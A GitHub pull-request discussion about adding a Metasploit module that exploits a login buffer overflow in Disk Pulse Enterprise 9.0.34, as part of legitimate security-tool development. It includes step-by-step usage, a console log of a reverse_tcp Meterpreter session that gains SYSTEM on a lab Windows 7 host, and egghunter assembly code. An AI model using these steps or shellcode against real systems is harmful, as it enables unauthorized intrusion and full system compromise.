Added Disk Pulse Enterprise Login Buffer Overflow

[Chiggins]

Adding a buffer overflow exploit for Disk Pulse Enterprise 9.0.34 for Microsoft Windows. This module is porting a PoC exploit which can be found on the Exploit DB page.

At it's current stage, this exploit is fully functional though it has two imperfections:

• Egghunter is hard-coded, doesn't use generate_egghunter()
• SEH is hard-coded, doesn't use generate_seh_record()

I spent some time trying to get these to work, but I'm at wits end trying to figure it out. After talking with @wvu-r7 on IRC, figured that since the exploit works that I'd go ahead and submit a PR.

Verification

List the steps needed to make sure this thing works

• Start msfconsole
• use exploit/windows/http/disk_pulse_enterprise_bof
• Set RHOST to the host to exploit
• Set your payload. For example set payload windows/meterpreter/reverse_tcp
• Set LHOST to your local address
• exploit
• Wait for the egghunter to complete, finding and executing your shellcode
• Verify payload completes

MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM                MMMMMMMMMM
MMMN$                           vMMMM
MMMNl  MMMMM             MMMMM  JMMMM
MMMNl  MMMMMMMN       NMMMMMMM  JMMMM
MMMNl  MMMMMMMMMNmmmNMMMMMMMMM  JMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMNM   MMMMMMM   MMMMM  jMMMM
MMMNI  WMMMM   MMMMMMM   MMMM#  JMMMM
MMMMR  ?MMNM             MMMMM .dMMMM
MMMMNm `?MMM             MMMM` dMMMMM
MMMMMMN  ?MM             MM?  NMMMMMN
MMMMMMMMNe                 JMMMMMNMMM
MMMMMMMMMMNm,            eMMMMMNMMNMM
MMMMNNMNMMMMMNx        MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM
        http://metasploit.com


       =[ metasploit v4.12.39-dev-9672759                 ]
+ -- --=[ 1597 exploits - 909 auxiliary - 274 post        ]
+ -- --=[ 458 payloads - 39 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use exploit/windows/http/disk_pulse_enterprise_bof 
msf exploit(disk_pulse_enterprise_bof) > set rhost 192.168.1.28
rhost => 192.168.1.28
msf exploit(disk_pulse_enterprise_bof) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(disk_pulse_enterprise_bof) > set lhost 192.168.1.26
lhost => 192.168.1.26
msf exploit(disk_pulse_enterprise_bof) > show options

Module options (exploit/windows/http/disk_pulse_enterprise_bof):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST    192.168.1.28     yes       The target address
   RPORT    80               yes       The target port
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.26     yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Disk Pulse Enterprise 9.0.34


msf exploit(disk_pulse_enterprise_bof) > exploit

[*] Started reverse TCP handler on 192.168.1.26:4444 
[*] Generating exploit...
[*] Total exploit size: 21383
[*] Triggering the exploit now...
[*] Please be patient, the egghunter may take a while...
[*] Sending stage (957999 bytes) to 192.168.1.28
[*] Meterpreter session 1 opened (192.168.1.26:4444 -> 192.168.1.28:49163) at 2016-10-27 21:45:52 -0500

meterpreter > sysinfo 
Computer        : WIN7X86
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter > getuid 
Server username: NT AUTHORITY\SYSTEM

[wchen-r7]

Just out of curiosity, what's wrong with generate_egghunter? Is it broken?

[Chiggins]

Not exactly sure. If I use that, then my exploit never works, shellcode is
never triggered and the stage isn't sent. I was definitely able to see hex
when debugging with pry, but never got anything to work with it.

On Oct 28, 2016 12:54 AM, "sinn3r" notifications@github.com wrote:

Just out of curiosity, what's wrong with generate_egghunter? Is it broken?

—
You are receiving this because you authored the thread.
Reply to this email directly, view it on GitHub
#7502 (comment),
or mute the thread
https://github.com/notifications/unsubscribe-auth/AAVZhPgcvIufYzc_GSgyuCyOuHt50Q60ks5q4Y4zgaJpZM4KjCKS
.

[wwebb-r7]

I've had problems with generate_egghunter in the past as well and had to write my own routines. Only thing I'd change would be either including the source for each stub in comments, or assembling them with Metasm doing something like:

egg_stub = Metasm::Shellcode.assemble(Metasm::Ia32.new(32), << FIN).encode_string
xor eax, eax
add ecx, eax
xor ecx, ecx
FIN

It becomes a problem if somewhere down the line either our customers or us try to debug some issue with it even if it's a simple egghunter. I know there's a lot of old code in framework that includes mystery binary blobs but there has never been a better time to learn from bad decisions.

[Chiggins]

@wwebb-r7 I took your suggestion and with a little bit of modification added the following code:

egghunter_asm = %Q|
      or    dx, 0xfff
      inc   edx
      push  edx
      push  0x2
      pop   eax
      int   0x2e
      cmp   al, 0x5
      pop   edx
      je    0x0
      mov   eax, 0x74303077
      mov   edi, edx
      scas  eax, dword ptr es:[edi]
      jne   0x5
      scas  eax, dword ptr es:[edi]
      jne   0x5
      jmp   edi
    |
egg_stub = Metasm::Shellcode.assemble(Metasm::Ia32.new(32), egghunter_asm).encode_string

But after reloading and trying to exploit, I get a message that Exploit failed: Metasm::ParseError invalid opcode near "scas" at "\"<unk>\"" line 13. Does Metasm not support scas? Even using metasm_shell.rb I get the same error. The hex for that line should be \xaf if that is any bit of useful information.

[wwebb-r7]

@Chiggins it wouldn't surprise me to find out that it doesn't support it. I'll take a look myself when I get a chance.

[wwebb-r7]

Works. Aside from the spaces at EOL that are causing the build to fail, and the code in comments issue we discussed, it's ready to land.

[Chiggins]

Got those all cleaned up and building. Let me know what else I could do.

[wwebb-r7]

Thanks. Merged.

[wwebb-r7]

Release Notes

This update adds an exploit module for a stack based buffer overflow vulnerability in Disk Pulse Enterprise 9.0.34 which grants SYSTEM privileges to the user.